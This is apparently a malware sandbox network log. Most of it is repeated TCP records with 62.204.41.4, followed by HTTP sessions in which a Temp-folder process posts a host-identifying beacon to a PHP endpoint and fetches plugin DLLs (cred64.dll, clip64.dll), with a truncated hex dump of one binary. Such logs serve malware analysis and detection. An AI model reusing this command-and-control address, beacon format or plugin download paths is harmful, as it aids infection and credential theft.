                                                                    Feb 8, 2023 21:33:59.140970945 CET805025662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.144504070 CET805025662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.144690037 CET5025680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.249646902 CET5025680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.250598907 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.311779022 CET805025662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.311973095 CET5025680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.312851906 CET805025762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.313064098 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.313801050 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.376164913 CET805025762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.379992962 CET805025762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.380162001 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.484143972 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.484843016 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.546614885 CET805025762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.546649933 CET805025862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.546725035 CET5025780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.546803951 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.548026085 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.609571934 CET805025862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.612236977 CET805025862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.612359047 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.718904018 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.719822884 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.780559063 CET805025962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.780688047 CET805025862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.780744076 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.780812025 CET5025880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.785012007 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.845988035 CET805025962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.849739075 CET805025962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:33:59.849888086 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.970029116 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:33:59.972332001 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.031013012 CET805025962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.031177044 CET5025980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.034914970 CET805026062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.035084963 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.035520077 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.098100901 CET805026062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.102188110 CET805026062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.102360010 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.221556902 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.222323895 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.284081936 CET805026162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.284317970 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.284351110 CET805026062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.284487963 CET5026080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.284821987 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.346343040 CET805026162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.348800898 CET805026162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.348893881 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.454627991 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.455971956 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.516484022 CET805026262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.516542912 CET805026162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.516654015 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.516685009 CET5026180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.517158031 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.577464104 CET805026262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.579685926 CET805026262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.579924107 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.688436985 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.689277887 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.749222994 CET805026262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.749422073 CET5026280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.750042915 CET805026362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.750235081 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.750617981 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.811212063 CET805026362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.814040899 CET805026362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:00.817823887 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.924040079 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:00.924753904 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.014820099 CET805026362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.014883995 CET805026462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.014987946 CET5026380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.015032053 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.016917944 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.079509020 CET805026462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.083281040 CET805026462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.086441994 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.205180883 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.206147909 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.268182039 CET805026462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.268223047 CET805026562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.268330097 CET5026480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.268426895 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.268881083 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.330631971 CET805026562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.334364891 CET805026562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.334582090 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.438787937 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.440460920 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.500756979 CET805026562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.501005888 CET5026580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.503062963 CET805026662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.503264904 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.503734112 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.567120075 CET805026662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.570391893 CET805026662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.573717117 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.691267967 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.692341089 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.752964973 CET805026762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.753143072 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.753798962 CET805026662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.753972054 CET5026680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.755474091 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.815995932 CET805026762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.818662882 CET805026762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.818897009 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.937041044 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.938010931 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.997987986 CET805026762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.998179913 CET5026780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:01.999682903 CET805026862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:01.999854088 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.000197887 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.061835051 CET805026862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.066241980 CET805026862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.066473961 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.172059059 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.174559116 CET5026980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.234019995 CET805026862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.234297991 CET5026880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.235013962 CET805026962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.235129118 CET5026980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.235624075 CET5026980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.296067953 CET805026962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.298657894 CET805026962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.298780918 CET5026980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.406816006 CET5026980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.408127069 CET5027080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.467627048 CET805026962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.467787027 CET5026980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.468512058 CET805027062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.468661070 CET5027080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.469353914 CET5027080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.530049086 CET805027062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.533246040 CET805027062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.533442974 CET5027080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.641397953 CET5027080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.642474890 CET5027180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.701956034 CET805027062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.702095032 CET5027080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.702796936 CET805027162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.702918053 CET5027180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.703342915 CET5027180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.763499022 CET805027162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.766514063 CET805027162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.766586065 CET5027180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.875885963 CET5027180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.876892090 CET5027280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.937129021 CET805027162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.937222004 CET5027180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.937263012 CET805027262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:02.937355042 CET5027280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.938055992 CET5027280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:02.998670101 CET805027262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.001113892 CET805027262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.001256943 CET5027280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.112837076 CET5027280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.113859892 CET5027380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.173367023 CET805027262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.173563957 CET5027280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.176290989 CET805027362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.176476955 CET5027380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.177895069 CET5027380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.240624905 CET805027362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.244455099 CET805027362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.244622946 CET5027380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.360037088 CET5027380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.366153955 CET5027480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.422746897 CET805027362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.422866106 CET5027380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.428739071 CET805027462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.428900003 CET5027480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.430516005 CET5027480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.493096113 CET805027462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.495460987 CET805027462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.495560884 CET5027480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.613195896 CET5027580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.614483118 CET5027480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.674916029 CET805027562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.675052881 CET5027580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.675784111 CET5027580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.676994085 CET805027462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.677100897 CET5027480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.737276077 CET805027562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.739691019 CET805027562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.739857912 CET5027580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.848587990 CET5027580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.855829000 CET5027680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.910255909 CET805027562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.910608053 CET5027580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.918391943 CET805027662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.918729067 CET5027680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.919337988 CET5027680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:03.981805086 CET805027662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.984200954 CET805027662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:03.984388113 CET5027680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.110057116 CET5027680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.110799074 CET5027780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.178066015 CET805027762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.178096056 CET805027662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.178302050 CET5027680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.178308010 CET5027780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.178879976 CET5027780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.240899086 CET805027762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.245558023 CET805027762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.245790958 CET5027780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.359718084 CET5027780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.361069918 CET5027880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.424137115 CET805027762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.424186945 CET805027862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.424340010 CET5027780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.424410105 CET5027880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.426126003 CET5027880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.488511086 CET805027862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.490910053 CET805027862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.491039991 CET5027880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.595130920 CET5027880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.596107006 CET5027980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.657634020 CET805027862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.657686949 CET805027962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.657900095 CET5027880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.657959938 CET5027980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.664943933 CET5027980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.726768017 CET805027962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.729394913 CET805027962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.729650021 CET5027980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.844396114 CET5027980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.845379114 CET5028080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.906158924 CET805027962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.906322002 CET5027980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.907877922 CET805028062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.908042908 CET5028080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.908554077 CET5028080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:04.971391916 CET805028062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.973890066 CET805028062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:04.974194050 CET5028080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.079766989 CET5028080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.080619097 CET5028180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.143042088 CET805028062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.143196106 CET5028080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.143922091 CET805028162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.144153118 CET5028180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.145159960 CET5028180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.207794905 CET805028162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.212060928 CET805028162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.212323904 CET5028180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.328471899 CET5028180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.329226017 CET5028280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.390491009 CET805028262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.390826941 CET5028280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.391062975 CET805028162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.391201019 CET5028180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.393872023 CET5028280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.455245972 CET805028262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.457537889 CET805028262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.457724094 CET5028280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.563117981 CET5028280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.565429926 CET5028380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.624707937 CET805028262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.624819994 CET5028280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:34:05.626988888 CET805028362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:34:05.627137899 CET5028380192.168.2.362.204.41.4
                                                                    • 62.204.41.4
                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    0192.168.2.34970262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:09.595885992 CET105OUTGET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                                                                    Host: 62.204.41.4
                                                                    Feb 8, 2023 21:31:09.656357050 CET106INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:09 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 162
                                                                    Connection: keep-alive
                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    1192.168.2.34970162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:09.596329927 CET105OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:09.661412954 CET106INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0
                                                                    Feb 8, 2023 21:31:09.718036890 CET106OUTGET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                                                                    Host: 62.204.41.4
                                                                    Feb 8, 2023 21:31:09.779712915 CET108INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:09 GMT
                                                                    Content-Type: application/octet-stream
                                                                    Content-Length: 91136
                                                                    Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                                                                    Connection: keep-alive
                                                                    ETag: "63dd4219-16400"
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 07 18 8f 2c 43 79 e1 7f 43 79 e1 7f 43 79 e1 7f 18 11 e2 7e 49 79 e1 7f 18 11 e4 7e cb 79 e1 7f 18 11 e5 7e 51 79 e1 7f 96 14 e5 7e 4c 79 e1 7f 96 14 e2 7e 52 79 e1 7f 96 14 e4 7e 62 79 e1 7f 18 11 e0 7e 46 79 e1 7f 43 79 e0 7f 19 79 e1 7f d8 17 e8 7e 40 79 e1 7f d8 17 e1 7e 42 79 e1 7f d8 17 1e 7f 42 79 e1 7f d8 17 e3 7e 42 79 e1 7f 52 69 63 68 43 79 e1 7f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d4 38 dd 63 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 de 00 00 00 8c 00 00 00 00 00 00 00 3e 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 4a 01 00 9c 00 00 00 3c 4b 01 00 3c 00 00 00 00 80 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 01 00 54 10 00 00 20 3f 01 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 3f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 dd 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 ee 61 00 00 00 f0 00 00 00 62 00 00 00 e2 00 